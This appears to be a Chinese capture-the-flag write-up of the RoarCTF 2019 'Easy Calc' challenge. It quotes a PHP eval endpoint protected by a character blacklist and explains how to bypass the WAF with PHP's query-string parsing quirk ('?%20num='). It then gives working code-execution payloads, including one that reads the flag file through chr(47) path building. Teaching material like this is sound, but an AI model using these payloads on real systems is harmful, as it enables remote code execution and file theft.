[RoarCTF 2019]Easy Calc -wp

在这里插入图片描述打开环境,发现一个简单的计算器,查看源码
在这里插入图片描述提示上了waf,然后还有一个calc.php,访问页面

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?> 

出现一段代码,接下来进行代码审计。
对num传参,过滤了一些字符,最后一个eval函数,这里很容易就想到代码执行漏洞。
当你任意传一个字母进去时候,会发现waf拦截,这里可以利用PHP的字符串解析特性绕过waf,简单来讲当你传?%20num=aaa;时php会默认删除空格等同于?num=aaa; ,但是waf会认为你没有传参,参数num被%20截断,这样就可以绕过waf检测。
在这里插入图片描述绕过后传入phpinfo()发现成功执行,一开始考虑上传一句话,然后发现php代码的过滤就是专门用来过滤一句话的

在这里插入图片描述看一下哪些函数被过滤
发现可以用
? num=var_dump(scandir(/))来查看上层目录
但/被过滤,可以用chr(47)绕过(感觉也可以通过这种方式上一句话,但试了一下没连上)
在这里插入图片描述```
payload:calc.php?%20num=var_dump(file_get_contents(chr(47).f1agg))

![在这里插入图片描述](https://img-blog.csdnimg.cn/20200621101808476.png)
已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页